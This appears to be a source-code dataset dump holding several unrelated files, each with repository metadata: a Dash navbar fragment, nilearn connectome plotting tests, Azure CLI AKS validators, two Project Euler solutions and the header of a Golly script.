dbc.Collapse(
dbc.Row(
children=links,
no_gutters=True,
className='flex-nowrap mt-3 mt-md-0',
align='center',
),
id=self._il[self.id_collapse],
navbar=True,
),
],
sticky='top',
color='dark',
dark=True,
)
def create_callbacks(self) -> None:
outputs = [(self.id_pages_content, 'children')]
inputs = [(self.id_url, 'pathname')]
@self.callback(outputs, inputs, [])
def render_page(pathname):
try:
return [self.nav_layouts[self.select_page_name(pathname)]]
except Exception as err:
return [html.Div(children=[f'Error rendering "{pathname}":\n{err}'])]
@self.callback(
[(self.id_collapse, 'is_open')],
[(self.id_toggler, 'n_clicks')],
[(self.id_collapse, 'is_open')],
)
def toggle_navbar_collapse(n_clicks, is_open):
return [not is_open if n_clicks else is_open]
def select_page_name(self, pathname):
raise NotImplementedError('nav_bar must be implemented by child class')
| true
| true
|
790b1d3cfe2d90ff414474016128db749d607913
| 8,330
|
py
|
Python
|
nilearn/plotting/tests/test_html_connectome.py
|
ryanhammonds/nilearn
|
f33cd4e4685d9050e5bba0a8ece1b0b0f0ad1be2
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/plotting/tests/test_html_connectome.py
|
ryanhammonds/nilearn
|
f33cd4e4685d9050e5bba0a8ece1b0b0f0ad1be2
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/plotting/tests/test_html_connectome.py
|
ryanhammonds/nilearn
|
f33cd4e4685d9050e5bba0a8ece1b0b0f0ad1be2
|
[
"BSD-2-Clause"
] | 1
|
2017-08-26T08:19:29.000Z
|
2017-08-26T08:19:29.000Z
|
import warnings
import numpy as np
from nilearn.plotting import cm
from nilearn.plotting.js_plotting_utils import decode
from nilearn.plotting import html_connectome
from .test_js_plotting_utils import check_html
def test_prepare_line():
e = np.asarray([0, 1, 2, 3], dtype=int)
n = np.asarray([[0, 1], [0, 2], [2, 3], [8, 9]], dtype=int)
pe, pn = html_connectome._prepare_line(e, n)
assert (pn == [0, 1, 0, 0, 2, 0, 2, 3, 0, 8, 9, 0]).all()
assert(pe == [0, 0, 0, 1, 1, 0, 2, 2, 0, 3, 3, 0]).all()
def _make_connectome():
adj = np.diag([1.5, .3, 2.5], 2)
adj += adj.T
adj += np.eye(5)
coord = np.arange(5)
coord = np.asarray([coord * 10, -coord, coord[::-1]]).T
return adj, coord
def test_get_connectome():
adj, coord = _make_connectome()
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
expected_x = np.asarray(
[0, 0, 0,
0, 20, 0,
10, 10, 0,
10, 30, 0,
20, 0, 0,
20, 20, 0,
20, 40, 0,
30, 10, 0,
30, 30, 0,
40, 20, 0,
40, 40, 0], dtype='<f4')
assert (con_x == expected_x).all()
assert {'_con_x', '_con_y', '_con_z', '_con_w', 'colorscale'
}.issubset(connectome.keys())
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
adj[adj == 0] = np.nan
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
assert (con_x == expected_x).all()
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
def test_view_connectome():
adj, coord = _make_connectome()
html = html_connectome.view_connectome(adj, coord)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(adj, coord, '85.3%',
title="SOME_TITLE")
check_html(html, False, 'connectome-plot')
assert "SOME_TITLE" in html.html
html = html_connectome.view_connectome(adj, coord, '85.3%',
linewidth=8.5, node_size=4.2)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(
adj, coord, '85.3%', linewidth=8.5, marker_size=np.arange(len(coord)))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_connectome():
deprecated_params = {'coords': 'node_coords',
'threshold': 'edge_threshold',
'cmap': 'edge_cmap',
'marker_size': 'node_size',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
adj, coord = _make_connectome()
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_connectome(adjacency_matrix=adj,
coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5, node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
marker_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adj,
coord,
'85.3%',
cm.cyan_orange,
8.5,
4.2,
)
old_params = ['coords', 'threshold', 'cmap', 'marker_size']
raised_warning_messages = ''.join(
str(warning.message) for warning in raised_warnings)
print(raised_warning_messages)
for old_param_ in old_params:
assert warning_msgs[old_param_] in raised_warning_messages
def test_get_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
markers = html_connectome._get_markers(coords, colors)
assert markers["marker_color"] == [
'#ff0000', '#007f00', '#000000', '#ffffff']
assert markers['markers_only']
con_x = decode(markers['_con_x'], '<f4')
assert np.allclose(con_x, coords[:, 0])
def test_view_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
html = html_connectome.view_markers(coords, colors)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords, marker_size=15)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=np.arange(len(coords)))
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=list(range(len(coords))))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_markers():
""" Tests whether use of deprecated keyword parameters of view_markers
raise corrrect warnings.
"""
deprecated_params = {'coords': 'marker_coords',
'colors': 'marker_color',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_markers(coords=coords,
marker_color=colors,
)
html_connectome.view_markers(marker_coords=coords,
colors=colors,
)
html_connectome.view_markers(marker_coords=coords,
marker_color=colors,
)
html_connectome.view_markers(coords,
colors,
)
old_params = ['coords', 'colors']
assert len(raised_warnings) == 2
for old_param_, raised_warning_ in zip(old_params, raised_warnings):
assert warning_msgs[old_param_] == str(raised_warning_.message)
assert raised_warning_.category is DeprecationWarning
| 40.436893
| 78
| 0.508283
|
import warnings
import numpy as np
from nilearn.plotting import cm
from nilearn.plotting.js_plotting_utils import decode
from nilearn.plotting import html_connectome
from .test_js_plotting_utils import check_html
def test_prepare_line():
e = np.asarray([0, 1, 2, 3], dtype=int)
n = np.asarray([[0, 1], [0, 2], [2, 3], [8, 9]], dtype=int)
pe, pn = html_connectome._prepare_line(e, n)
assert (pn == [0, 1, 0, 0, 2, 0, 2, 3, 0, 8, 9, 0]).all()
assert(pe == [0, 0, 0, 1, 1, 0, 2, 2, 0, 3, 3, 0]).all()
def _make_connectome():
adj = np.diag([1.5, .3, 2.5], 2)
adj += adj.T
adj += np.eye(5)
coord = np.arange(5)
coord = np.asarray([coord * 10, -coord, coord[::-1]]).T
return adj, coord
def test_get_connectome():
adj, coord = _make_connectome()
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
expected_x = np.asarray(
[0, 0, 0,
0, 20, 0,
10, 10, 0,
10, 30, 0,
20, 0, 0,
20, 20, 0,
20, 40, 0,
30, 10, 0,
30, 30, 0,
40, 20, 0,
40, 40, 0], dtype='<f4')
assert (con_x == expected_x).all()
assert {'_con_x', '_con_y', '_con_z', '_con_w', 'colorscale'
}.issubset(connectome.keys())
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
adj[adj == 0] = np.nan
connectome = html_connectome._get_connectome(adj, coord)
con_x = decode(connectome['_con_x'], '<f4')
assert (con_x == expected_x).all()
assert (connectome['cmin'], connectome['cmax']) == (-2.5, 2.5)
def test_view_connectome():
adj, coord = _make_connectome()
html = html_connectome.view_connectome(adj, coord)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(adj, coord, '85.3%',
title="SOME_TITLE")
check_html(html, False, 'connectome-plot')
assert "SOME_TITLE" in html.html
html = html_connectome.view_connectome(adj, coord, '85.3%',
linewidth=8.5, node_size=4.2)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_connectome(
adj, coord, '85.3%', linewidth=8.5, marker_size=np.arange(len(coord)))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_connectome():
deprecated_params = {'coords': 'node_coords',
'threshold': 'edge_threshold',
'cmap': 'edge_cmap',
'marker_size': 'node_size',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
adj, coord = _make_connectome()
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_connectome(adjacency_matrix=adj,
coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5, node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
marker_size=4.2,
)
html_connectome.view_connectome(adjacency_matrix=adj,
node_coords=coord,
edge_threshold='85.3%',
edge_cmap=cm.cyan_orange,
linewidth=8.5,
node_size=4.2,
)
html_connectome.view_connectome(adj,
coord,
'85.3%',
cm.cyan_orange,
8.5,
4.2,
)
old_params = ['coords', 'threshold', 'cmap', 'marker_size']
raised_warning_messages = ''.join(
str(warning.message) for warning in raised_warnings)
print(raised_warning_messages)
for old_param_ in old_params:
assert warning_msgs[old_param_] in raised_warning_messages
def test_get_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
markers = html_connectome._get_markers(coords, colors)
assert markers["marker_color"] == [
'#ff0000', '#007f00', '#000000', '#ffffff']
assert markers['markers_only']
con_x = decode(markers['_con_x'], '<f4')
assert np.allclose(con_x, coords[:, 0])
def test_view_markers():
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
html = html_connectome.view_markers(coords, colors)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(coords, marker_size=15)
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=np.arange(len(coords)))
check_html(html, False, 'connectome-plot')
html = html_connectome.view_markers(
coords, marker_size=list(range(len(coords))))
check_html(html, False, 'connectome-plot')
def test_params_deprecation_view_markers():
deprecated_params = {'coords': 'marker_coords',
'colors': 'marker_color',
}
deprecation_msg = (
'The parameter "{}" will be removed in 0.6.0 release of Nilearn. '
'Please use the parameter "{}" instead.'
)
warning_msgs = {old_: deprecation_msg.format(old_, new_)
for old_, new_ in deprecated_params.items()
}
coords = np.arange(12).reshape((4, 3))
colors = ['r', 'g', 'black', 'white']
with warnings.catch_warnings(record=True) as raised_warnings:
html_connectome.view_markers(coords=coords,
marker_color=colors,
)
html_connectome.view_markers(marker_coords=coords,
colors=colors,
)
html_connectome.view_markers(marker_coords=coords,
marker_color=colors,
)
html_connectome.view_markers(coords,
colors,
)
old_params = ['coords', 'colors']
assert len(raised_warnings) == 2
for old_param_, raised_warning_ in zip(old_params, raised_warnings):
assert warning_msgs[old_param_] == str(raised_warning_.message)
assert raised_warning_.category is DeprecationWarning
| true
| true
|
790b20490561ed6c0d10e67739b18f7d99b60936
| 8,760
|
py
|
Python
|
src/aks-preview/azext_aks_preview/_validators.py
|
blackchoey/azure-cli-extensions
|
bbfd80ba164c4605dbdbe5e2b8dc26c3aa0f29e4
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/_validators.py
|
blackchoey/azure-cli-extensions
|
bbfd80ba164c4605dbdbe5e2b8dc26c3aa0f29e4
|
[
"MIT"
] | null | null | null |
src/aks-preview/azext_aks_preview/_validators.py
|
blackchoey/azure-cli-extensions
|
bbfd80ba164c4605dbdbe5e2b8dc26c3aa0f29e4
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import os.path
import re
from math import ceil
from ipaddress import ip_network
from knack.log import get_logger
from azure.cli.core.util import CLIError
import azure.cli.core.keys as keys
logger = get_logger(__name__)
def validate_ssh_key(namespace):
if hasattr(namespace, 'no_ssh_key') and namespace.no_ssh_key:
return
string_or_file = (namespace.ssh_key_value or
os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub'))
content = string_or_file
if os.path.exists(string_or_file):
logger.info('Use existing SSH public key file: %s', string_or_file)
with open(string_or_file, 'r') as f:
content = f.read()
elif not keys.is_valid_ssh_rsa_public_key(content):
if namespace.generate_ssh_keys:
# figure out appropriate file names:
# 'base_name'(with private keys), and 'base_name.pub'(with public keys)
public_key_filepath = string_or_file
if public_key_filepath[-4:].lower() == '.pub':
private_key_filepath = public_key_filepath[:-4]
else:
private_key_filepath = public_key_filepath + '.private'
content = keys.generate_ssh_keys(private_key_filepath, public_key_filepath)
logger.warning("SSH key files '%s' and '%s' have been generated under ~/.ssh to "
"allow SSH access to the VM. If using machines without "
"permanent storage like Azure Cloud Shell without an attached "
"file share, back up your keys to a safe location",
private_key_filepath, public_key_filepath)
else:
raise CLIError('An RSA key file or key value must be supplied to SSH Key Value. '
'You can use --generate-ssh-keys to let CLI generate one for you')
namespace.ssh_key_value = content
def validate_create_parameters(namespace):
if not namespace.name:
raise CLIError('--name has no value')
if namespace.dns_name_prefix is not None and not namespace.dns_name_prefix:
raise CLIError('--dns-prefix has no value')
def validate_k8s_version(namespace):
"""Validates a string as a possible Kubernetes version. An empty string is also valid, which tells the server
to use its default version."""
if namespace.kubernetes_version:
k8s_release_regex = re.compile(r'^[v|V]?(\d+\.\d+\.\d+.*)$')
found = k8s_release_regex.findall(namespace.kubernetes_version)
if found:
namespace.kubernetes_version = found[0]
else:
raise CLIError('--kubernetes-version should be the full version number, '
'such as "1.7.12" or "1.8.7"')
def validate_linux_host_name(namespace):
"""Validates a string as a legal host name component.
This validation will also occur server-side in the ARM API, but that may take
a minute or two before the user sees it. So it's more user-friendly to validate
in the CLI pre-flight.
"""
# https://stackoverflow.com/questions/106179/regular-expression-to-match-dns-hostname-or-ip-address
rfc1123_regex = re.compile(r'^([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])(\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9]))*$') # pylint:disable=line-too-long
found = rfc1123_regex.findall(namespace.name)
if not found:
raise CLIError('--name cannot exceed 63 characters and can only contain '
'letters, numbers, or dashes (-).')
def validate_max_pods(namespace):
"""Validates that max_pods is set to a reasonable minimum number."""
# kube-proxy and kube-svc reside each nodes,
# 2 kube-proxy pods, 1 azureproxy/heapster/dashboard/tunnelfront are in kube-system
minimum_pods_required = ceil((namespace.node_count * 2 + 6 + 1) / namespace.node_count)
if namespace.max_pods != 0 and namespace.max_pods < minimum_pods_required:
raise CLIError('--max-pods must be at least {} for a managed Kubernetes cluster to function.'
.format(minimum_pods_required))
def validate_nodes_count(namespace):
"""Validate that min_count and max_count is set to 1-100"""
if namespace.min_count is not None:
if namespace.min_count < 1 or namespace.min_count > 100:
raise CLIError('--min-count must be in the range [1,100]')
if namespace.max_count is not None:
if namespace.max_count < 1 or namespace.max_count > 100:
raise CLIError('--max-count must be in the range [1,100]')
def validate_ip_ranges(namespace):
if namespace.api_server_authorized_ip_ranges is not None:
if namespace.api_server_authorized_ip_ranges == '':
return
for ip in namespace.api_server_authorized_ip_ranges.split(','):
try:
ip_network(ip)
except ValueError:
raise CLIError("--api-server-authorized-ip-ranges should be list of IPv4 addresses or CIDRs")
def validate_nodepool_name(namespace):
"""Validates a nodepool name to be at most 12 characters, alphanumeric only."""
if namespace.nodepool_name != "":
if len(namespace.nodepool_name) > 12:
raise CLIError('--nodepool-name can contain atmost 12 characters')
if not namespace.nodepool_name.isalnum():
raise CLIError('--nodepool-name should only contain alphanumeric characters')
def validate_vm_set_type(namespace):
"""Validates the vm set type string."""
if namespace.vm_set_type is not None:
if namespace.vm_set_type == '':
return
if namespace.vm_set_type.lower() != "availabilityset" and \
namespace.vm_set_type.lower() != "virtualmachinescalesets":
raise CLIError("--vm-set-type can only be VirtualMachineScaleSets or AvailabilitySet")
def validate_load_balancer_sku(namespace):
"""Validates the load balancer sku string."""
if namespace.load_balancer_sku is not None:
if namespace.load_balancer_sku == '':
return
if namespace.load_balancer_sku.lower() != "basic" and namespace.load_balancer_sku.lower() != "standard":
raise CLIError("--load-balancer-sku can only be standard or basic")
def validate_load_balancer_outbound_ips(namespace):
"""validate load balancer profile outbound IP ids"""
if namespace.load_balancer_outbound_ips is not None:
ip_id_list = [x.strip() for x in namespace.load_balancer_outbound_ips.split(',')]
if not all(ip_id_list):
raise CLIError("--load-balancer-outbound-ips cannot contain whitespace")
def validate_load_balancer_outbound_ip_prefixes(namespace):
"""validate load balancer profile outbound IP prefix ids"""
if namespace.load_balancer_outbound_ip_prefixes is not None:
ip_prefix_id_list = [x.strip() for x in namespace.load_balancer_outbound_ip_prefixes.split(',')]
if not all(ip_prefix_id_list):
raise CLIError("--load-balancer-outbound-ip-prefixes cannot contain whitespace")
def validate_taints(namespace):
"""Validates that provided taint is a valid format"""
regex = re.compile(r"^[a-zA-Z\d][\w\-\.\/]{0,252}=[a-zA-Z\d][\w\-\.]{0,62}:(NoSchedule|PreferNoSchedule|NoExecute)$") # pylint: disable=line-too-long
if namespace.node_taints is not None and namespace.node_taints != '':
for taint in namespace.node_taints.split(','):
if taint == "":
continue
found = regex.findall(taint)
if not found:
raise CLIError('Invalid node taint: %s' % taint)
def validate_priority(namespace):
"""Validates the node pool priority string."""
if namespace.priority is not None:
if namespace.priority == '':
return
if namespace.priority != "Low" and \
namespace.priority != "Regular":
raise CLIError("--priority can only be Low or Regular")
def validate_eviction_policy(namespace):
"""Validates the node pool priority string."""
if namespace.eviction_policy is not None:
if namespace.eviction_policy == '':
return
if namespace.eviction_policy != "Delete" and \
namespace.eviction_policy != "Deallocate":
raise CLIError("--eviction-policy can only be Delete or Deallocate")
| 45.388601
| 184
| 0.649201
|
import os
import os.path
import re
from math import ceil
from ipaddress import ip_network
from knack.log import get_logger
from azure.cli.core.util import CLIError
import azure.cli.core.keys as keys
logger = get_logger(__name__)
def validate_ssh_key(namespace):
if hasattr(namespace, 'no_ssh_key') and namespace.no_ssh_key:
return
string_or_file = (namespace.ssh_key_value or
os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub'))
content = string_or_file
if os.path.exists(string_or_file):
logger.info('Use existing SSH public key file: %s', string_or_file)
with open(string_or_file, 'r') as f:
content = f.read()
elif not keys.is_valid_ssh_rsa_public_key(content):
if namespace.generate_ssh_keys:
public_key_filepath = string_or_file
if public_key_filepath[-4:].lower() == '.pub':
private_key_filepath = public_key_filepath[:-4]
else:
private_key_filepath = public_key_filepath + '.private'
content = keys.generate_ssh_keys(private_key_filepath, public_key_filepath)
logger.warning("SSH key files '%s' and '%s' have been generated under ~/.ssh to "
"allow SSH access to the VM. If using machines without "
"permanent storage like Azure Cloud Shell without an attached "
"file share, back up your keys to a safe location",
private_key_filepath, public_key_filepath)
else:
raise CLIError('An RSA key file or key value must be supplied to SSH Key Value. '
'You can use --generate-ssh-keys to let CLI generate one for you')
namespace.ssh_key_value = content
def validate_create_parameters(namespace):
if not namespace.name:
raise CLIError('--name has no value')
if namespace.dns_name_prefix is not None and not namespace.dns_name_prefix:
raise CLIError('--dns-prefix has no value')
def validate_k8s_version(namespace):
if namespace.kubernetes_version:
k8s_release_regex = re.compile(r'^[v|V]?(\d+\.\d+\.\d+.*)$')
found = k8s_release_regex.findall(namespace.kubernetes_version)
if found:
namespace.kubernetes_version = found[0]
else:
raise CLIError('--kubernetes-version should be the full version number, '
'such as "1.7.12" or "1.8.7"')
def validate_linux_host_name(namespace):
rfc1123_regex = re.compile(r'^([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])(\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]{0,61}[a-zA-Z0-9]))*$')
found = rfc1123_regex.findall(namespace.name)
if not found:
raise CLIError('--name cannot exceed 63 characters and can only contain '
'letters, numbers, or dashes (-).')
def validate_max_pods(namespace):
minimum_pods_required = ceil((namespace.node_count * 2 + 6 + 1) / namespace.node_count)
if namespace.max_pods != 0 and namespace.max_pods < minimum_pods_required:
raise CLIError('--max-pods must be at least {} for a managed Kubernetes cluster to function.'
.format(minimum_pods_required))
def validate_nodes_count(namespace):
if namespace.min_count is not None:
if namespace.min_count < 1 or namespace.min_count > 100:
raise CLIError('--min-count must be in the range [1,100]')
if namespace.max_count is not None:
if namespace.max_count < 1 or namespace.max_count > 100:
raise CLIError('--max-count must be in the range [1,100]')
def validate_ip_ranges(namespace):
if namespace.api_server_authorized_ip_ranges is not None:
if namespace.api_server_authorized_ip_ranges == '':
return
for ip in namespace.api_server_authorized_ip_ranges.split(','):
try:
ip_network(ip)
except ValueError:
raise CLIError("--api-server-authorized-ip-ranges should be list of IPv4 addresses or CIDRs")
def validate_nodepool_name(namespace):
if namespace.nodepool_name != "":
if len(namespace.nodepool_name) > 12:
raise CLIError('--nodepool-name can contain atmost 12 characters')
if not namespace.nodepool_name.isalnum():
raise CLIError('--nodepool-name should only contain alphanumeric characters')
def validate_vm_set_type(namespace):
if namespace.vm_set_type is not None:
if namespace.vm_set_type == '':
return
if namespace.vm_set_type.lower() != "availabilityset" and \
namespace.vm_set_type.lower() != "virtualmachinescalesets":
raise CLIError("--vm-set-type can only be VirtualMachineScaleSets or AvailabilitySet")
def validate_load_balancer_sku(namespace):
if namespace.load_balancer_sku is not None:
if namespace.load_balancer_sku == '':
return
if namespace.load_balancer_sku.lower() != "basic" and namespace.load_balancer_sku.lower() != "standard":
raise CLIError("--load-balancer-sku can only be standard or basic")
def validate_load_balancer_outbound_ips(namespace):
if namespace.load_balancer_outbound_ips is not None:
ip_id_list = [x.strip() for x in namespace.load_balancer_outbound_ips.split(',')]
if not all(ip_id_list):
raise CLIError("--load-balancer-outbound-ips cannot contain whitespace")
def validate_load_balancer_outbound_ip_prefixes(namespace):
if namespace.load_balancer_outbound_ip_prefixes is not None:
ip_prefix_id_list = [x.strip() for x in namespace.load_balancer_outbound_ip_prefixes.split(',')]
if not all(ip_prefix_id_list):
raise CLIError("--load-balancer-outbound-ip-prefixes cannot contain whitespace")
def validate_taints(namespace):
regex = re.compile(r"^[a-zA-Z\d][\w\-\.\/]{0,252}=[a-zA-Z\d][\w\-\.]{0,62}:(NoSchedule|PreferNoSchedule|NoExecute)$")
if namespace.node_taints is not None and namespace.node_taints != '':
for taint in namespace.node_taints.split(','):
if taint == "":
continue
found = regex.findall(taint)
if not found:
raise CLIError('Invalid node taint: %s' % taint)
def validate_priority(namespace):
if namespace.priority is not None:
if namespace.priority == '':
return
if namespace.priority != "Low" and \
namespace.priority != "Regular":
raise CLIError("--priority can only be Low or Regular")
def validate_eviction_policy(namespace):
if namespace.eviction_policy is not None:
if namespace.eviction_policy == '':
return
if namespace.eviction_policy != "Delete" and \
namespace.eviction_policy != "Deallocate":
raise CLIError("--eviction-policy can only be Delete or Deallocate")
| true
| true
|
790b20caefe2c94a43433ce3db4e17257b12fc27
| 448
|
py
|
Python
|
Python/14 - Longest Collatz sequence/main.py
|
Dinoosawruss/project-euler
|
9be76ef134671fb0b4e1caa412173770b2edfcfd
|
[
"MIT"
] | null | null | null |
Python/14 - Longest Collatz sequence/main.py
|
Dinoosawruss/project-euler
|
9be76ef134671fb0b4e1caa412173770b2edfcfd
|
[
"MIT"
] | null | null | null |
Python/14 - Longest Collatz sequence/main.py
|
Dinoosawruss/project-euler
|
9be76ef134671fb0b4e1caa412173770b2edfcfd
|
[
"MIT"
] | null | null | null |
steps = 0
c = {}
m = 1
def collatz(n):
global steps
if n in c:
steps += c[n]
return
if n == 1:
return
steps += 1
if n % 2 == 0:
collatz(n/2)
return
collatz(3 * n + 1)
def main(max):
global steps
global m
for i in range(1, max):
collatz(i)
c[i] = steps
if steps > c[m]:
m = i
steps = 0
main(1000000)
print(m)
| 11.487179
| 27
| 0.419643
|
steps = 0
c = {}
m = 1
def collatz(n):
global steps
if n in c:
steps += c[n]
return
if n == 1:
return
steps += 1
if n % 2 == 0:
collatz(n/2)
return
collatz(3 * n + 1)
def main(max):
global steps
global m
for i in range(1, max):
collatz(i)
c[i] = steps
if steps > c[m]:
m = i
steps = 0
main(1000000)
print(m)
| true
| true
|
790b20ed7e1c6e50df0dd5e3a47b79b8bfae940b
| 1,656
|
py
|
Python
|
project_euler/solutions/problem_68.py
|
cryvate/project-euler
|
6ed13880d7916c34554559f5f71662a863735eda
|
[
"MIT"
] | null | null | null |
project_euler/solutions/problem_68.py
|
cryvate/project-euler
|
6ed13880d7916c34554559f5f71662a863735eda
|
[
"MIT"
] | 9
|
2017-02-20T23:41:40.000Z
|
2017-04-16T15:36:54.000Z
|
project_euler/solutions/problem_68.py
|
cryvate/project-euler
|
6ed13880d7916c34554559f5f71662a863735eda
|
[
"MIT"
] | null | null | null |
from typing import List, Generator
def n_gons(partial: List[int], size: int, sums: int=None) -> \
Generator[List[int], None, None]:
length = len(partial)
if length == size * 2:
yield partial
for i in range(1, size * 2 + 1):
if i in partial:
continue
partial.append(i)
if length == 2:
sums = sum(partial[0: 3])
elif (length > 2 and length % 2 == 0 and
sums != sum(partial[-1: -4: -1]))\
or \
(length == size * 2 - 1 and sums != partial[1] + partial[-1] +
partial[-2]):
partial.pop()
continue
yield from n_gons(list(partial), size, sums)
partial.pop()
def n_gon_to_representation(n_gon: List[int]) -> int:
n_gon_str = [str(n) for n in n_gon]
size = len(n_gon_str) // 2
result = ''
minimal = min(n_gon[0], *n_gon[3::2])
index = n_gon.index(minimal)
start = n_gon.index(minimal) // 2 if index >= 3 else 0
for i in range(start, start + size):
current = i % size
if current == 0:
result += ''.join(n_gon_str[0:3])
elif current == size - 1:
result += ''.join([n_gon_str[-1], n_gon_str[-2], n_gon_str[1]])
else:
result += ''.join([n_gon_str[current * 2 + 1],
n_gon_str[current * 2],
n_gon_str[current * 2 + 2]])
return int(result)
def solve() -> int:
return max([n_gon_to_representation(n_gon)
for n_gon in n_gons([], 5)
if n_gon_to_representation(n_gon) < 10 ** 16])
| 27.147541
| 75
| 0.504227
|
from typing import List, Generator
def n_gons(partial: List[int], size: int, sums: int=None) -> \
Generator[List[int], None, None]:
length = len(partial)
if length == size * 2:
yield partial
for i in range(1, size * 2 + 1):
if i in partial:
continue
partial.append(i)
if length == 2:
sums = sum(partial[0: 3])
elif (length > 2 and length % 2 == 0 and
sums != sum(partial[-1: -4: -1]))\
or \
(length == size * 2 - 1 and sums != partial[1] + partial[-1] +
partial[-2]):
partial.pop()
continue
yield from n_gons(list(partial), size, sums)
partial.pop()
def n_gon_to_representation(n_gon: List[int]) -> int:
n_gon_str = [str(n) for n in n_gon]
size = len(n_gon_str) // 2
result = ''
minimal = min(n_gon[0], *n_gon[3::2])
index = n_gon.index(minimal)
start = n_gon.index(minimal) // 2 if index >= 3 else 0
for i in range(start, start + size):
current = i % size
if current == 0:
result += ''.join(n_gon_str[0:3])
elif current == size - 1:
result += ''.join([n_gon_str[-1], n_gon_str[-2], n_gon_str[1]])
else:
result += ''.join([n_gon_str[current * 2 + 1],
n_gon_str[current * 2],
n_gon_str[current * 2 + 2]])
return int(result)
def solve() -> int:
return max([n_gon_to_representation(n_gon)
for n_gon in n_gons([], 5)
if n_gon_to_representation(n_gon) < 10 ** 16])
| true
| true
|
790b2172f11693a484bd3b9749b5261fd8dd9c4e
| 3,190
|
py
|
Python
|
MetafierV2.py
|
IkeoluwaStat/QFT
|
fe36763e90e3601dfab2a78a08962113343efd0c
|
[
"MIT"
] | 163
|
2017-07-31T23:07:56.000Z
|
2022-01-30T03:07:12.000Z
|
MetafierV2.py
|
IkeoluwaStat/QFT
|
fe36763e90e3601dfab2a78a08962113343efd0c
|
[
"MIT"
] | null | null | null |
MetafierV2.py
|
IkeoluwaStat/QFT
|
fe36763e90e3601dfab2a78a08962113343efd0c
|
[
"MIT"
] | 7
|
2017-09-14T16:42:06.000Z
|
2022-02-25T15:04:01.000Z
|
# Metafier V2: writes directly to output.mc
# Uses numpy and memoization to speed up a crap ton & compress data a bit
# ===REQUIRES metatemplate11.mc===
import golly as g
